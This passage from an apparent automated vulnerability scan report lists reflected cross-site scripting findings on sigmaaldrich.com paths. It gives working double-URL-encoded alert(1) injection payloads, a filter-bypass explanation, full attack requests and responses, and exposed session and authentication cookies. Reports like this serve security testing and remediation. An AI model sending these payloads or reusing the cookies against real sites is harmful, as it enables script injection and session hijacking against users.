Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:58 GMT
Content-Length: 28948
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc4bf8d";alert(1)//fb934201d4c/medialib/labware/labware-icons/glassware","E404") ;
   </script>
...[SNIP]...

1.374. http://www.sigmaaldrich.com/etc/medialib/labware/labware-icons/glassware [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/labware/labware-icons/glassware

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 90ea3%2522%253balert%25281%2529%252f%252f3f083b9afc7 was submitted in the REST URL parameter 2. This input was echoed as 90ea3";alert(1)//3f083b9afc7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib90ea3%2522%253balert%25281%2529%252f%252f3f083b9afc7/labware/labware-icons/glassware HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:00 GMT
Content-Length: 28948
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib90ea3";alert(1)//3f083b9afc7/labware/labware-icons/glassware","E404") ;
   </script>
...[SNIP]...

1.375. http://www.sigmaaldrich.com/etc/medialib/labware/labware-icons/glassware [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/labware/labware-icons/glassware

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 904d5%2522%253balert%25281%2529%252f%252fabe7f69f5da was submitted in the REST URL parameter 3. This input was echoed as 904d5";alert(1)//abe7f69f5da in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/labware904d5%2522%253balert%25281%2529%252f%252fabe7f69f5da/labware-icons/glassware HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:02 GMT
Content-Length: 28948
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/labware904d5";alert(1)//abe7f69f5da/labware-icons/glassware","E404") ;
   </script>
...[SNIP]...

1.376. http://www.sigmaaldrich.com/etc/medialib/labware/labware-icons/glassware [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/labware/labware-icons/glassware

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b7d39%2522%253balert%25281%2529%252f%252f7f43bf32a17 was submitted in the REST URL parameter 4. This input was echoed as b7d39";alert(1)//7f43bf32a17 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/labware/labware-iconsb7d39%2522%253balert%25281%2529%252f%252f7f43bf32a17/glassware HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:04 GMT
Content-Length: 28948
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/labware/labware-iconsb7d39";alert(1)//7f43bf32a17/glassware","E404") ;
   </script>
...[SNIP]...

1.377. http://www.sigmaaldrich.com/etc/medialib/labware/labware-icons/glassware [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/labware/labware-icons/glassware

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 667bd%2522%253balert%25281%2529%252f%252f07f36d0da76 was submitted in the REST URL parameter 5. This input was echoed as 667bd";alert(1)//07f36d0da76 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/labware/labware-icons/glassware667bd%2522%253balert%25281%2529%252f%252f07f36d0da76 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:06 GMT
Content-Length: 28948
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/labware/labware-icons/glassware667bd";alert(1)//07f36d0da76","E404") ;
   </script>
...[SNIP]...

1.378. http://www.sigmaaldrich.com/etc/medialib/labware/labware-icons/multiwell-plates [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/labware/labware-icons/multiwell-plates

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dfc7b%2522%253balert%25281%2529%252f%252ff1d6d11a0ec was submitted in the REST URL parameter 1. This input was echoed as dfc7b";alert(1)//f1d6d11a0ec in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etcdfc7b%2522%253balert%25281%2529%252f%252ff1d6d11a0ec/medialib/labware/labware-icons/multiwell-plates HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
